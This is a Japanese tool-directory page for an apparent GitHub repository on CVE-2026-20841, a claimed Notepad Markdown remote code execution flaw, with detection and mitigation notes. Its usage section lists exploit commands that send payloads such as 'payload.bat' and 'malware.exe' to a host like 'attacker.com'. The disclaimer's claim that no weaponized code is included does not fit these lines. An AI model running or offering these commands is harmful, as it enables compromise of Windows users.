Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-20841 — CVE-2026-20841 | Kitploit
ツール/GitHubGitHub/0xblackash/cve-2026-20841
ペイロード生成脆弱性分析エクスプロイトマルウェア分析学習と教育バイナリエクスプロイトラボと実践
GitHub0xblackash/cve-2026-20841

CVE-2026-20841

CVE-2026-20841

リポジトリを見る
1113ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-20841 - Windows Notepad リモートコード実行 (RCE)

ChatGPT Image Jun 1, 2026, 11_00_33 PM

Windows Severity CVE Status

セキュリティ研究・技術分析リポジトリ


⚠️ このリポジトリは教育、防御、研究目的のみに使用されることを意図しています。


📖 概要

CVE-2026-20841 は、Microsoft Windows Notepad の Markdown 処理機能に影響を与える重大なリモートコード実行 (RCE) 脆弱性です。

攻撃者は、脆弱なバージョンの Windows Notepad で特別に細工されたファイルが開かれた場合に、任意のコード実行を引き起こす可能性があります。

影響

  • リモートコード実行 (RCE)
  • 任意のコード実行
  • 潜在的なユーザーレベルの侵害
  • セキュリティ境界の回避
  • マルウェア配布経路

🎯 影響を受ける製品

製品状態
Windows 11 Notepad脆弱
Windows 10 Notepad脆弱
更新/パッチ適用済みバージョン脆弱ではない

🔥 脆弱性情報


📖 使用方法 :

root@kitploit:~
python CVE-2026-20841.py 192.168.1.100 80 malware.exe

Node.js バージョン

root@kitploit:~
node CVE-2026-20841.js <host> <port> <payload-filename>

例:

root@kitploit:~
node CVE-2026-20841.js attacker.com 445 payload.bat

VBScript バージョン (Windows ネイティブ)

root@kitploit:~
cscript //nologo CVE-2026-20841.vbs <host> <port> <payload-filename>

例:

root@kitploit:~
cscript //nologo CVE-2026-20841.vbs 192.168.1.45 80 update.exe

🛠 技術的詳細

脆弱性は、Windows Notepad の Markdown コンテンツ処理機能に存在します。

特別に細工されたファイルを開くと、安全でないメモリ操作がトリガーされ、現在のユーザーのコンテキストで任意のコード実行につながる可能性があります。

攻撃フロー

root@kitploit:~
Attacker
    │
    ▼
Crafted Markdown File
    │
    ▼
Victim Opens File
    │
    ▼
Vulnerable Markdown Parser
    │
    ▼
Memory Corruption
    │
    ▼
Code Execution


🧪 ラボ環境

root@kitploit:~
OS          : Windows 11
Application : Notepad
Architecture: x64
Debugger    : WinDbg
Analysis    : Static + Dynamic

🔍 検出

侵害指標 (IOC)

  • 不審な Markdown ファイル
  • Notepad からの予期しない子プロセス
  • 異常な Notepad クラッシュ
  • メモリ破損イベント
  • Notepad に関連する EDR アラート

🛡 緩和策

  • Microsoft のセキュリティ更新プログラムを適用する。
  • 信頼できないソースからのファイルのオープンを制限する。
  • EDR/XDR 監視を有効にする。
  • アプリケーション制御ポリシーを使用する。
  • Notepad を含むプロセス作成イベントを監視する。

📚 参考資料

  • Microsoft セキュリティアドバイザリ
  • MITRE CVE データベース
  • Windows セキュリティドキュメント
  • セキュリティ研究出版物

⚠ 免責事項

このリポジトリは武器化されたエクスプロイトコードを含んでいません。

提供される情報は以下の目的のみを意図しています:

  • セキュリティ研究
  • 防御分析
  • 脆弱性管理
  • 教育目的

ユーザーは、すべての適用される法律および規制を遵守する責任があります。


⭐ このリポジトリがあなたの研究に役立った場合は、スターを検討してください。

サイバーセキュリティ研究 • 脆弱性分析 • 防御セキュリティ

ツールをダウンロード
フィールド値
CVECVE-2026-20841
タイプリモートコード実行
攻撃ベクトル細工されたファイル
ユーザー操作必要
必要な権限なし
深刻度重大
ベンダーMicrosoft